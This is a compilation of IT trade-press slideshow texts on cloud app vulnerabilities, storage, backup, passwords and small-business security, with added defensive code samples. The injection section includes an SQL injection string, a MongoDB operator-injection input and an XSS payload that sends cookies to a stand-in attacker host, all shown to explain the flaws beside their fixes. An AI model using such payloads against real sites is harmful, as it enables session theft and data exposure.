Ten Vulnerabilities that Impact Enterprise Cloud Apps

Third-Party Components

Vulnerabilities in third-party components: The widespread use of third-party and open source components in enterprise cloud apps can attract attackers and lead to data exposure. Recent examples include Heartbleed and the OpenSSL CCS Injection vulnerability. Attackers can take advantage of these flaws to steal enterprise data and read encrypted traffic.


SQL Injections

Vulnerabilities that enable attackers to inject SQL code into an app: Some apps contain vulnerabilities that let attackers inject malicious SQL statements into one of the app’s fields. A successful exploit can have a wide-ranging impact, from attackers being able to escalate privileges in the app to making the app host malware. A recent example of this was in AdRotate, a plugin for the popular SaaS app WordPress.
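The mechanics of the flaw fit in a few lines. This hypothetical sketch uses Python's built-in sqlite3 module with an in-memory table to contrast a string-built query (vulnerable) with a parameterized one (safe):

```python
import sqlite3

# Toy in-memory database standing in for an app's backend store.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")
conn.execute("INSERT INTO users VALUES ('bob', 'user')")

# Vulnerable: user input is concatenated directly into the SQL statement,
# so input can terminate the string and append its own logic.
user_input = "' OR '1'='1"
query = "SELECT * FROM users WHERE name = '" + user_input + "'"
rows_vulnerable = conn.execute(query).fetchall()   # every row comes back

# Safe: a parameterized query treats the input as data, never as SQL.
rows_safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)
).fetchall()                                       # no match, no injection

print(len(rows_vulnerable), "rows leaked;", len(rows_safe), "rows via safe query")
```

The same principle (bind parameters, never string concatenation) applies to any SQL database or driver.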


Database Injections

Vulnerabilities that enable attackers to inject other database code into an app: Even apps that don’t use SQL can suffer from injection attacks. An example of this is the MongoDB Hash Injection, in which the use of the Web application framework Ruby on Rails in conjunction with MongoDB can lead to attackers bypassing authentication, exfiltrating data and even launching denial-of-service attacks.
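The trick behind this class of attack is that frameworks which parse query strings into hashes can hand the database an operator expression where the app expected a plain string. This is a minimal illustration (the in-memory "collection" and `find_user` function are hypothetical, mimicking MongoDB's operator semantics):

```python
# Toy stand-in for a MongoDB collection and its operator-style matching.
users = [{"name": "alice", "token": "s3cret"}]

def matches(value, condition):
    # Mimics how a MongoDB filter treats a dict as an operator expression:
    # {"$gt": x} means "greater than x" instead of "equal to".
    if isinstance(condition, dict) and "$gt" in condition:
        return value > condition["$gt"]
    return value == condition

def find_user(token_param):
    return [u for u in users if matches(u["token"], token_param)]

# Expected use: the client supplies a plain string token.
assert find_user("wrong-token") == []          # no match, as intended

# Attack: a query string like token[$gt]= is parsed into a dict, turning
# the equality check into "token > ''", which matches every user.
print(find_user({"$gt": ""}))
```

The defense is to validate that parameters are the expected scalar type before passing them into a query filter.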


Client-Side Script Injections

Vulnerabilities that enable attackers to inject client-side scripts into the app: Another class of vulnerabilities enables attackers to inject code that is used to lure users to malicious sites or distribute malware to user devices. Common exploits are cross-site scripting (XSS) and iFrame injection. An example of this is the recent XSS vulnerability discovered in Offiria, an open source enterprise social network, which let remote attackers place malicious links in the app.
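The root cause of XSS is rendering untrusted input as markup. A minimal sketch using Python's standard html module shows the difference escaping makes (the comment payload is illustrative):

```python
import html

# Hypothetical attacker-supplied comment containing a script payload.
comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Unsafe: interpolating untrusted input straight into markup means the
# browser will execute the injected script.
unsafe = "<div class='comment'>%s</div>" % comment

# Safe: escaping converts <, >, & and quotes to entities, so the browser
# renders the payload as inert text instead of running it.
safe = "<div class='comment'>%s</div>" % html.escape(comment)
print(safe)
```

Most web frameworks apply this escaping automatically in templates; vulnerabilities typically arise where that auto-escaping is bypassed.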


URL Redirects

Vulnerabilities that lead to URL redirection: Some apps are designed in a way that enables an attacker to get in the middle of the URL path and redirect a user to a different URL. One example is the covert redirect vulnerability in OAuth 2.0 and OpenID, in which an attacker can use the authentication process to redirect users to malicious sites or steal their information.
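The usual mitigation is to validate a redirect target before honoring it. This hypothetical sketch (the allowlist and function name are illustrative) accepts only relative paths or allowlisted hosts:

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"app.example.com"}   # hypothetical allowlist of trusted hosts

def safe_redirect_target(url, default="/"):
    """Return url only if it stays on an allowed host; otherwise a safe default."""
    parts = urlparse(url)
    # Relative paths (no scheme, no host) stay on the current site.
    if not parts.scheme and not parts.netloc:
        return url
    # Absolute URLs must use http(s) and point at an allowlisted host.
    if parts.scheme in ("http", "https") and parts.netloc in ALLOWED_HOSTS:
        return url
    return default

print(safe_redirect_target("/dashboard"))                   # allowed
print(safe_redirect_target("https://evil.example/phish"))   # rejected
print(safe_redirect_target("//evil.example/phish"))         # rejected
```

Note the last case: scheme-relative URLs (`//host/path`) have no scheme but do carry a host, which is why the check tests both fields.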


Disclosure of shared documents

Vulnerabilities that lead to the disclosure of shared documents to unintended recipients: A well-publicized vulnerability involves the “share” function in some cloud storage apps. In it, a user can inadvertently disclose a document to unintended recipients. Major vendors like Dropbox have patched this vulnerability, but others remain unremediated. Given that other app categories like business intelligence, customer relationship management, and software development also enable sharing, this design vulnerability could impact more than just cloud storage apps.

Encrypted and Unencrypted Channels

Vulnerabilities involving the use of both encrypted and unencrypted channels for file movement: Some apps have made a design decision to use an encrypted channel to upload files and an unencrypted channel to download them, which can lead to data leakage. An example is the cloud storage app JustCloud, which calls this design out in its terms and conditions. Another example is the use of unencrypted channels by native cloud storage applications on mobile devices such as iPhones and Android devices.


Misconfigured IaaS Access Settings

Vulnerabilities associated with the misconfiguration of infrastructure-as-a-service access settings: Misconfiguring infrastructure as a service can lead to data exposure. An example of this is the misconfiguration of Amazon S3 buckets. A user can easily overlook a key setting, the configuration of the bucket as “public,” which can lead to the public exposure of the contents in the logical container. Since the access configuration applies to the bucket and all of its contents, that exposure can lead to significant data leakage.
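Audits for this misconfiguration typically check a bucket's ACL for grants to the AllUsers group. This sketch operates on a dict shaped like the response from boto3's `get_bucket_acl()` (the sample ACL is fabricated; in practice you would fetch the real one with `boto3.client("s3").get_bucket_acl(Bucket=name)`):

```python
# URI that S3 uses to denote "everyone on the Internet" in ACL grants.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

def public_grants(acl):
    """Return the grants that give the AllUsers group (i.e. everyone) access."""
    return [g for g in acl["Grants"]
            if g["Grantee"].get("URI") == ALL_USERS]

# Hypothetical ACL mirroring the shape boto3's get_bucket_acl() returns.
sample_acl = {
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS},
         "Permission": "READ"},   # this grant exposes the whole bucket
    ]
}

flagged = public_grants(sample_acl)
for grant in flagged:
    print("PUBLIC:", grant["Permission"])
```

Because the grant applies to the bucket, every object inside inherits the exposure, which is why a single overlooked setting can leak an entire data set.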


IaaS and PaaS Authentication

Vulnerabilities resulting from under-configuring infrastructure- and platform-as-a-service authentication: Organizations that do not take advantage of multi-factor authentication in their infrastructure as a service (IaaS) and platform as a service (PaaS) accounts can expose their administration consoles. An attacker can hijack credentials, as happened to source code hosting provider Code Spaces, an attack that ultimately put the company out of business.


Weak Cryptography

Vulnerabilities resulting from the use of weak cryptography: Most cloud apps use the Secure Sockets Layer (SSL) protocol to encrypt communication between user devices and servers. Servers configured with weak encryption can leave apps vulnerable to brute-force decryption attacks and data leakage. An example of this is the RC4 stream cipher, whose known weaknesses can leave SSL connections vulnerable to plaintext-recovery and bit-flipping attacks.
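On the server side, the fix is a cipher policy that excludes weak algorithms. A minimal sketch using Python's standard ssl module (the OpenSSL cipher string shown is one reasonable example, not a universal recommendation):

```python
import ssl

# Build a server-side TLS context and restrict it to strong cipher suites.
# "HIGH" selects strong ciphers; the "!" entries explicitly exclude anonymous
# key exchange, null encryption, RC4 and MD5-based suites.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ciphers("HIGH:!aNULL:!eNULL:!RC4:!MD5")

# Confirm RC4 no longer appears in the negotiable cipher list.
rc4_present = any("RC4" in c["name"] for c in ctx.get_ciphers())
print("RC4 enabled:", rc4_present)
```

Equivalent cipher-string settings exist for web servers such as nginx (`ssl_ciphers`) and Apache (`SSLCipherSuite`).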


On August 6, Russian hackers announced they had stolen more than one billion username and password combinations, along with accompanying email addresses — a big grab, considering that there are nearly three billion Internet users. By that estimation, up to one-third of Internet users may be vulnerable to data loss. The breach is a stark reminder for individual users and enterprises alike to take a look at how they’re protecting their personally identifiable information (more commonly referred to as PII).

Cisco recently predicted that there will be 21 billion Internet devices in use by 2018, and a recent survey from Netskope shows that most enterprises use an average of 508 cloud apps across an average of three devices per user. Both of these statistics underscore the dizzying number of usernames, passwords, and email addresses that are used across a myriad of devices and apps, a trend that only looks to continue for the foreseeable future. Organizations today are already relying heavily on cloud apps to help improve productivity and reduce operating costs, and as security standards continue to improve, businesses are becoming increasingly comfortable storing business-critical data in the cloud.

However, with increased popularity comes more attention from malicious hackers trying to access PII and other sensitive data. It’s more critical than ever before to understand how — and where — you’re storing your data, and the variety of vulnerabilities that can exist in the apps in your network.

There are four broad categories of vulnerabilities in cloud apps: components, code, design, and configuration. This slideshow features 10 types of vulnerabilities, identified by Ravi Balupari, senior manager, Cloud Security Research and Content Development at Netskope, that fall into these respective categories, and a brief overview of how they impact enterprise cloud apps.

Source: http://www.itbusinessedge.com/slideshows/ten-vulnerabilities-that-impact-enterprise-cloud-apps.html


How Poor Website Performance Impacts Revenue

E-commerce Performance Matters

Abandoned Shopping Carts

If your website takes too long to load, your customers will abandon their shopping carts. In fact, once page load time exceeds six seconds, you can lose up to 90 percent of your visitors. In today’s competitive market, where customers expect near-instantaneous page loads, your business will truly suffer if your website is slow.

Website Crashes

Without a scale-out, fault-tolerant database, your website will not only be unable to handle peaks in traffic, it runs the risk of crashing altogether. If this happens, your customers will surely look elsewhere. Research shows that if your system goes offline, even momentarily, you run the risk of losing them to another vendor.

Loss of Loyal Customers

It’s a simple concept — repeated poor performance leads to customer loss. Even worse than an abandoned shopping cart, lost customer loyalty can really impact the bottom line. Don’t let a faulty database ruin your reputation and ultimately your business.

Unsuccessful Marketing Campaigns

If your website performance is lackluster, then your marketing campaigns cannot be successfully executed. Why? You need customer data to power campaigns. Without customer data for analytics or targeting, customer conversion and new customer acquisition will be nearly impossible, further hurting your bottom line.

Closed Shop

Worst-case scenario — if your website can’t keep up with demand during peak times, then your biggest sales day could become your last. Bottom line, invest in a 100 percent fault-tolerant, scale-out database that will ensure zero downtime and provide your customers with a seamless shopping experience.

Consumer shopping trends are shifting. Online shopping has seen such explosive growth over the last several years that e-commerce is now outpacing the growth of brick-and-mortar businesses. This has fundamentally changed the way that businesses think about performance, both business and website.

In the always-on world of e-commerce, companies pay the price for latency. Amazon found that every 100 milliseconds of added latency cost it one percent in sales, and Google found that an extra 0.5 seconds in search page generation time dropped site traffic by 20 percent. Slow performance affects everything from individual transactions to customer retention and ultimately revenue. E-commerce businesses simply cannot afford to suffer a slip in performance.

This slideshow features five ways, identified by Clustrix, that performance affects the bottom line, as well as tips on how to ensure they don’t happen to you.

Source: http://www.itbusinessedge.com/slideshows/how-poor-website-performance-impacts-revenue.html

Calculating the ROI of IT Asset Management

Initial data collection

The cost for manual data center audits can be high (as much as $15 per asset), even for “readily available” data, which includes equipment manufacturer, model, serial number, name, and location.

Data accuracy

A hidden cost here is the error rate of manual data collection, often between 10 and 15 percent. This inaccuracy affects the audit and can often result in re-audits.

Tracking changes

A large share of data center outages, unauthorized changes and extended mean time to repair (MTTR) for data center assets stems from the inability to accurately record and track changes manually in the data center – which in turn drives up audit costs.

Repeat data audits

A similar cost and effort is involved with repeated manual data audits (such as semi-annual or on-demand audits) as with initial data collection efforts.

High cost: Based on these factors and assumptions, it is not unreasonable for data center operators to see costs of up to $60,000, or 20 person-weeks, for manual data center audits. And the results are frequently inaccurate.

Lower-cost alternative: Based on the current cost of implementing a typical passive RFID solution in this scenario, the return on investment would come in less than 12 months, with tracking accuracy of 99.5 percent.
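The arithmetic behind these figures can be sketched in a few lines. The asset count and RFID implementation cost below are illustrative assumptions, not vendor numbers; only the $15-per-asset and semi-annual audit figures come from the points above:

```python
# Back-of-the-envelope ROI sketch for replacing manual audits with RFID.
assets = 2000                # assumed data center asset count
cost_per_asset = 15          # manual audit cost per asset ($), per the figures above
audits_per_year = 2          # e.g. semi-annual audits

annual_manual_cost = assets * cost_per_asset * audits_per_year
print("Annual manual audit cost: $%d" % annual_manual_cost)

rfid_solution_cost = 55000   # hypothetical one-time RFID implementation cost
payback_months = rfid_solution_cost / (annual_manual_cost / 12)
print("Payback period: %.1f months" % payback_months)
```

Plugging in different asset counts or audit frequencies shows how quickly the manual approach dominates the cost picture.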


Every data center conducts some type of regular audit. But IT professionals and data center managers may not be aware of the high – and often hidden – costs associated with their manual audits.

The key to the effective and efficient management of an organization’s data center lies in the ability to capture and maintain a comprehensive picture of what data center assets exist, where each asset is located and how each individual asset is connected to other assets.

As the complexity of a given data center increases – multiple aisles, multiple high-density cabinets, 2- and 4-post racks containing thousands of individual servers and storage devices – the task of capturing asset information becomes increasingly complex. Simple solutions, such as noting serial numbers in static spreadsheets, become less reliable and more costly as hundreds of man-hours are spent wandering a data center looking for asset tags.

Data center IT professionals need holistic data center tools that are designed to track infrastructure assets as well as facilities assets such as rack power distribution units (RPDUs), PDUs, computer room air handlers (CRAHs) and uninterruptible power supplies (UPSs). Although these items rarely if ever move, they must also be audited and maintained. IT asset management (ITAM) tools must help users automate and streamline this process. Ultimately, a programmatic approach based in science and using reliable, repeatable and cost-effective tools and systems is the best solution.

In this slideshow, Asset Vue takes a look at four cost points organizations need to consider when determining the ROI of an IT asset management solution.


Source: http://www.itbusinessedge.com/slideshows/calculating-the-roi-of-it-asset-management.html

Holographs, Liquid-State and DNA: The Future of Data Storage

The Advancements

Storing important documents on your local PC has been common practice for years. We’ve seen the technology change drastically in a very short amount of time, and a lot of exciting innovations are on the way. Check out how far we’ve come since IBM first introduced the 960-bit punch card in 1928.


What will the future hold? One possibility is datastickies. Imagine storing your data on a set of sticky notes. The technology aims to replace USB flash storage by offering something that is cheaper, more convenient and more user-friendly.

Datastickies store from 4 GB to 32 GB of data on a sliver of graphene between two protective layers. Graphene is a groundbreaking new material composed of tightly packed carbon atoms in a two-dimensional honeycomb lattice. It has a minimum thickness of just one atom.

Monitors will need to have a special surface that can interact with the datastickies. Simply stick the post-it note device to an area of the monitor and access the data.

DNA Storage

What started off as a joke turned into reality when two genomicists discussed how appropriate storing data on DNA could be.

Data files are converted into binary code and then into A, T, G, and C code, which stand for the four DNA bases. From these letters, blueprints for the DNA are drawn and the actual strands are created. To the human eye, the completed DNA fragments look like a tiny amount of dust at the bottom of a test tube.

Why is this a step forward? Well, data stored on DNA could be kept intact for thousands of years. Compare this to magnetic tape, which needs to be replaced every five years, and you can see the advantage.

Helium Drive Technology

In 2013, HGST created the first 6 TB 3.5-inch hard drive; apparently, this was made possible by sealing helium gas inside the device.

Helium has one-seventh the density of air, so it dramatically reduces the friction between the spinning disks in the device. As a result, it lowers the electrical power the hard drive consumes and allows more disks to be packed closer together, hence increasing the capacity.

SMR Drives

Seagate claims that Shingled Magnetic Recording (SMR) technology is the first step to reaching a 20 TB hard drive by 2020. SMR involves packing a disk’s tracks closer together; overlapping the tracks allows more data to be written on the same amount of space.

However, despite their larger capacity, SMR drives suffer from slow data rewrites. Because the tracks overlap, any data that’s already on an overlapped track has to be picked up and sequentially rewritten at a later point.

Multi-Cloud Storage

Researchers at IBM are working on a new technology that they like to call “the cloud-of-clouds.” They claim to have developed a service that allows you to move data between multiple cloud platforms in real time.

The multi-cloud distribution storage system links public and private cloud services and is intended to help avoid service outages from the separate providers.

Liquid-State Storage

Instead of storing information in a solid state, metal inside the hard drive is kept in its liquid state. However, the substance isn’t a true liquid metal like mercury or gallium; it’s actually a compound known as vanadium dioxide. It can be given a positive or negative charge and be manipulated to switch between conducting and insulating.

HAMR Drives

Another advancement in hard drive density is heat-assisted magnetic recording (HAMR). In these drives, a tiny laser blasts the surface of the disk platter and heats it up to change its magnetic properties. By doing this, more bits can be stored per square inch and the surface becomes easier to write to.

Seagate puts it in perspective like this: A digital library of all the books written in the world would be approximately 400 TB – in the near future, all these books could conceivably be stored on as few as 20 HAMR devices.

Holographic Storage

Holographic storage is another potential game changer in the world of data storage. Instead of storing the data on the surface of the disk, holographic storage works in three dimensions. DVDs may be able to use multiple layers, but the laser that reads them can only do so from one angle at a time. Holographic technology uses the full depth of the medium and can store data at multiple levels.

The technology offers long-term media stability and a more reliable alternative to discs and tape. Data can be stored securely for just over 50 years.

Cassette Tapes

Surely cassette tapes have had their day? Not according to Sony. The company has recently developed a new magnetic cassette tape that can hold 148 GB per square inch of tape. The new technique uses a vacuum thin-film process called sputter deposition; argon ions are shot at the polymer film to create a layer of fine magnetic crystals with an average size of 7.7 nanometers. However, the rebirth of cassettes isn’t intended to replace Blu-rays and CDs. The tapes are developed for long-term storage of industrial-sized data.


Last year, 2.4 billion people used the cloud for accessing email, social media, games, backup storage and apps. With this figure projected to reach 3.6 billion by 2018, it would appear that cloud computing is here to stay due to our need to store and access ever expanding amounts of data. But the cloud is just the beginning with exciting data storage developments on the horizon.

This slideshow, provided by Ebuyer, depicts how far data storage has evolved since the IBM punch card in 1928 and further analyzes the future of this innovative industry. Datastickies, DNA storage and helium drives are just some of the possibilities for the future of data storage.



Source: http://www.itbusinessedge.com/slideshows/holographs-liquid-state-and-dna-the-future-of-data-storage.html

Five Disruptive Forces Changing the Role of the Systems Integrator

Disruptor No. 1: CFOs seize control as the IT decision makers

Thanks to the cloud, there has been a fundamental shift in power from the chief technology officer (CTO) to the chief financial officer (CFO) in terms of tapping innovative technology to drive business process optimization. CFOs are now key technology decision makers, and innovative SIs need to refocus their approach, skills and offerings on specific solutions that address core business process challenges. These range from unified financial budgeting and planning to effective measurement of business growth.

Disruptor No. 2: Big IT implementations face extinction

Tedious software evaluations and drawn-out implementations are an expensive and unsustainable practice. To compete in today’s dynamic business environment, SIs must move away from large, upfront fees and focus on harnessing new revenue streams from packaged, repeatable solutions. Growth for progressive SIs will increasingly come from selling configurable solutions that address specific cloud-to-cloud or cloud-to-premise implementations and integrations.

Disruptor No. 3: IT budgets go flat

Most companies spend the majority of their IT budgets on maintaining IT systems rather than business innovation. In fact, tight IT budgets are driving businesses to look for agile, proven IT solutions without high upfront costs to fulfill new technology requirements. To ensure their spot in the cloud-era evolution, SIs must become the ongoing IT caretakers and assume traditional IT maintenance responsibilities such as upgrades and integration so that client IT departments can focus more time on innovation. SIs will also need to continuously customize their solutions to meet shifting needs and keep pace with business change.

Disruptor No. 4: IP rules keep changing

IT purchasing behavior has also changed intellectual property (IP) rules. Companies are turning away from $100+M Oracle and SAP implementations and embracing iterative, agile implementations. This shift is opening new SI revenue opportunities. SIs must invest in repeatable IP, turning their deep understanding of unique business processes into products with recurring, repeatable revenue to drive down implementation costs. SIs’ unique IP will become the foundation for sustainable, long-term growth for their business.

Disruptor No. 5: Cloud systems create new silos

The purchasing rules continue to blur as line-of-business leaders now have access to new applications in minutes thanks to cloud technology. This has created another critical business challenge – the rise of cloud-system silos. As businesses clamor to bring together the islands of data now housed in a variety of cloud applications, the top opportunity for SIs in the coming years will be to integrate that data. SIs will be increasingly tasked with bringing all of that disparate data into one central nerve center to drive responsive businesses.

The new SI model for the cloud era

To make the most out of today’s cloud reality, SIs must become partners to the business. Driving the rapid adoption of proven, business-specific solutions that remove cloud silos, SIs will empower IT to reap the rewards of the integrated cloud.

Focusing on IT strategy, flexible design and long-term technology architecture will help their enterprise customers thrive today and better prepare for tomorrow. It’s a brave new cloud, and innovative SIs will be its champions.



The growth of the “integrated enterprise” depends on connecting disparate cloud systems to make them work for today’s dynamic business environment, and innovative systems integrators (SIs) will be the catalyst. The cloud is transforming the SI focus from implementation/customization to long-term business solutions that deliver the agile, future-proof technology roadmaps that today’s C-level executives demand.

Executives from top business consulting firm Armanino and data integration experts from Scribe Software share their take on the five disruptive forces changing the game for leading systems integrators and how they need to evolve to make the most of the new cloud realities.


Source:  http://www.itbusinessedge.com/slideshows/five-disruptive-forces-changing-the-role-of-the-systems-integrator.html

Top Five Epic Fails of Enterprise Endpoint Backup

Retrofitting existing server backup

Server backup vendors have tried to retrofit their own solutions to capture a share of the booming backup market. But this approach almost never succeeds because it doesn’t give organizations what they need; it requires human intervention, is unreliable and doesn’t scale appropriately. Backup needs to happen automatically, transparently and frequently. If business users have to manually initiate or manage the backup of their data, it likely won’t happen.

Restricting/prohibiting data save on endpoints

Some organizations take a completely different approach and opt not to install an endpoint solution at all. Instead, they create policies prohibiting or restricting users from saving data to their laptop or desktop.

Unfortunately, this approach hinges on users changing the fundamental manner in which they work – which effectively guarantees it will not succeed. By employing a secure endpoint backup solution, all endpoint data can be protected without IT admins creating restrictive policies.

Tape-based backup

Some companies attempt to back up endpoint devices to tape, but this approach has many shortcomings. Tapes are a fragile medium, subject to damage from both heat and light exposure. Doing a full restore may require multiple tapes and it could take days simply waiting for the right tapes to arrive.

After a failure, the backup is now the only copy of the data. If an organization only writes backups to tape, and for whatever reason the organization can’t restore from that tape, it will have lost all of its data.

Manual, user-initiated backup to external drives

Surprisingly, many companies still attempt to protect endpoint data by asking or requiring employees to manually back up their data to external drives. This approach can be very costly, especially if the company has thousands of employees purchasing these devices and subsequently charging them back to the company. And once the users obtain the drives, they tend to forget or refuse to back up their devices. Additionally, these drives are frequently lost or stolen, thus compromising the data they were meant to protect. As a best practice, enterprises should keep a minimum of two copies of data backed up in separate locations.

Gluing together different solutions

The last – and most common – approach is trying to leverage multiple existing or disparate technologies to piece together ad-hoc endpoint backup. What usually results is an inconsistent, unreliable tool that doesn’t protect everyone or every platform, and is a nightmare for both users and desktop admins.


Traditionally, “backup” referred to protecting and storing information on a server in an onsite data center. It was a predictable task, and business data lived in a controlled environment that underwent regularly scheduled updates by IT.

Fast forward to today: Enterprises have experienced a major shift in where data lives. Driven by bring your own device (BYOD), the consumerization of IT and a highly mobile workforce, critical enterprise data has moved from the data center to end-user endpoints (and seemingly beyond the reach of IT). The reality is that IT administrators are facing an unpredictable, decentralized environment in which they have far less control and visibility into what’s happening with enterprise data.

Some have made the shift to the edge successfully, while others have not. In this slideshow, endpoint data protection and management provider Code42 outlines five of the most common mistakes and outdated methods associated with protecting endpoint data.


Source: http://www.itbusinessedge.com/slideshows/top-five-epic-fails-of-enterprise-endpoint-backup.html

Five Steps to Protect Your Passwords Before It’s Too Late

Pay special attention to your email credentials

A lot of users fail to recognize that their email account can be a front door to their entire digital life. Think about how many times you may have reset your password on some other site and the recovery link is sent to your email account. In addition, avoid opening emails from unknown senders and clicking on suspicious email attachments; exercise caution when clicking on enticing links sent through email, instant messages, or posted on social networks; and do not share confidential information when replying to an email.

Change passwords on important sites

It’s a good idea to immediately (and regularly) change passwords for sites that hold a lot of personal information, financial details, and other private data. Cyber criminals who have your credentials could try to use them to access more information on these accounts. This is particularly true if you have used the same password on multiple sites. Attackers will often try to use stolen credentials on multiple sites.

Create stronger passwords

When changing your password, make sure that your new password is a minimum of eight characters long, and that it doesn’t contain your real name, username, or any other personally identifying information. The best passwords include a combination of uppercase and lowercase letters, numbers, and special characters.
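The criteria above are easy to satisfy with a generator built on Python's secrets module, which is designed for security-sensitive randomness (the function name and length default are illustrative):

```python
import secrets
import string

# Full character pool: upper, lower, digits and symbols.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_password(length=16):
    """Generate a random password containing all four character classes."""
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        # Retry until every required character class is represented.
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)
                and any(c in string.punctuation for c in pw)):
            return pw

print(generate_password())
```

Note the use of `secrets.choice` rather than the `random` module, whose output is predictable and unsuitable for passwords.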

Don’t re-use passwords

Once a hacker has your account information and credentials, they’ll try to use it to gain access to all your accounts. This is why it’s important to create a unique password for each account. If you vary your passwords across multiple logins, they won’t be able to access other sites with the same information.

Enable two-factor authentication

Many websites now offer two-factor (or two-step) authentication, which adds an extra layer of security to your account by requiring you to enter your password, plus a code that you receive on your mobile device via text message or a token generator, to log in to the site. This may add complexity to the login process, but it significantly improves the security of your account. If nothing else, use this for your most important accounts.
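The codes produced by most authenticator-app token generators follow the TOTP scheme (RFC 6238): server and device share a secret, and both derive the same six-digit code from the current time. A minimal stdlib sketch of the code-generation step (real deployments provision the secret via QR code and tolerate clock drift):

```python
import base64
import hmac
import struct
import time

def totp(secret_b32: str, at: float = None, digits: int = 6, step: int = 30) -> str:
    """Derive a TOTP code from a base32 shared secret and a timestamp."""
    key = base64.b32decode(secret_b32)
    # Counter = number of 30-second steps since the Unix epoch.
    counter = int((time.time() if at is None else at) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    # Dynamic truncation (RFC 4226): pick 4 bytes at an offset from the digest.
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test-vector secret (base32 of "12345678901234567890"), at t=59s.
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", at=59))   # 287082
```

Because the code changes every 30 seconds, a stolen password alone is no longer enough to log in.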


Reports of data breaches, online accounts being hacked and passwords being stolen have become so commonplace, users are no doubt becoming numb and complacent to the real dangers these threats present. Even so, it’s essential that organizations and users take proactive and ongoing action to protect their sensitive information.

For instance, recent reports detail the alleged theft of 1.2 billion usernames and passwords by a Russian cyber crime group. While on the surface this appears to be a massive breach, it’s a breach that took time, maybe even years, to accomplish. So while it’s important to respond to incidents such as this, it’s just as important – or maybe even more important – to establish strong password best practices that take a proactive rather than reactive approach to dealing with breaches.

In this slideshow, we take a look at five steps, identified by Symantec, that organizations and individual users should take now to protect their most sensitive password-protected information.


Source: http://www.itbusinessedge.com/slideshows/five-steps-to-protect-your-passwords-before-its-too-late.html

Small Business Cybersecurity Readiness Checklist

Small and medium-sized businesses (SMBs), vital to the U.S. economy, are vulnerable when it comes to cybersecurity. Small business owners often make the mistake of thinking that their data will have little value to hackers. Yet, financial accounts and employee, customer or partner information are all appealing to cyber criminals, and if SMBs are unprepared, even more accessible.

The cybersecurity experts over at F-Secure have compiled the following information to help small and medium-sized business owners assess their exposure to cyber threats.

Reference: http://www.itbusinessedge.com/slideshows/small-business-cybersecurity-readiness-checklist.html?utm_source=itbe&utm_medium=email&utm_campaign=FNS&nr=FNS&dni=140488440&rni=13501729

5 security basics your small business should be following

They’re obvious to some, but not everyone takes these precautions.

Over the last year or so, I’ve been covering a number of information security, or infosec, events. And I keep hearing the same two messages. The amount of money being spent on security is increasing. The cost and impact of breaches are increasing even more rapidly.

In other words, we’re spending more and losing more. What can we do?

If you want to reduce the risk of having your systems accessed by unauthorised parties and mitigate the damage when your systems are breached, there are a few things you can do.

1. Don’t open links in email

The word is that the eBay hack that was reported last week started when some eBay staff members were duped into opening links in phishing emails. As a result, their user credentials were captured and the bad guys used that information to access the records of over 140 million eBay users.

2. Use complex passwords

Every year, there’s a report in the papers telling us that “123456” and “password” are still the most common passwords.

Seriously, use complex passwords that use a combination of upper and lower case letters, numbers and symbols.

3. Keep systems up to date

Those security updates that Microsoft, Apple and others release periodically are important. Many of the systems that are breached are attacked through vulnerabilities that the software companies have fixed and issued patches for.

Update your server and desktop systems regularly.
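On Linux servers, applying those patches regularly can be as simple as a couple of commands. A sketch, assuming a Debian/Ubuntu or Red Hat style package manager (adapt to whatever your systems actually run):

```shell
# Debian/Ubuntu: refresh the package index, then apply available updates
sudo apt-get update && sudo apt-get upgrade -y

# Red Hat / CentOS equivalent
sudo yum update -y
```

Scheduling something like this (or the distribution's unattended-upgrades mechanism) keeps machines patched without relying on someone remembering to do it.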

4. It’s not about viruses any more

Most of the attacks made on systems come from compromising people, not systems. Although viruses are still out there, the broader category of malware (a portmanteau of “malicious” and “software”) includes software that comes from installing dodgy programs, accessing dodgy websites and opening untrusted email attachments.

That means your most important line of defence isn’t security software – it’s educating your staff. Remember, prevention is the best cure.

5. Practise your breach procedures

You’ve got some breach procedures written down, haven’t you? Things like how to recover data from backups, who to notify if your systems are compromised (customers, suppliers, business partners, service providers) and fallback procedures for when your IT systems are offline for a few days.

Think about what would happen if your main systems were offline for an hour, a day or a week, and put in place plans for each situation. You might not be able to trade as normal, but see if there are ways to keep operating, even if only in a limited way.
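Part of practising recovery is proving that a backup actually restores intact, rather than discovering a corrupt archive mid-incident. A minimal restore drill, sketched in Python with illustrative helper names (a real drill would cover whole systems, not a single file):

```python
import hashlib
import tarfile
import tempfile
from pathlib import Path

def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def backup_and_verify(source: Path, workdir: Path) -> bool:
    """Back up a file to a tar archive, restore it elsewhere and confirm
    the restored copy is byte-identical -- a minimal restore drill."""
    archive = workdir / "backup.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(source, arcname=source.name)
    restore_dir = workdir / "restore"
    restore_dir.mkdir()
    with tarfile.open(archive) as tar:
        tar.extractall(restore_dir)
    return sha256(source) == sha256(restore_dir / source.name)

with tempfile.TemporaryDirectory() as tmp:
    work = Path(tmp)
    data = work / "customers.csv"
    data.write_text("id,name\n1,Alice\n")
    print(backup_and_verify(data, work))  # True
```

The point of scripting the drill is that it can run on a schedule: a backup you have never restored is a hope, not a procedure.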

The trouble with listening to specific security vendors is that they focus on the problems their solutions solve. But your business needs to think of all the potential risks and actions.

This is where the security industry is letting us down. Their focus is on point solutions. But by looking at how your business runs and how you can work around the loss or compromise of a system you can reduce the risk of your business being crippled if a key system is compromised.
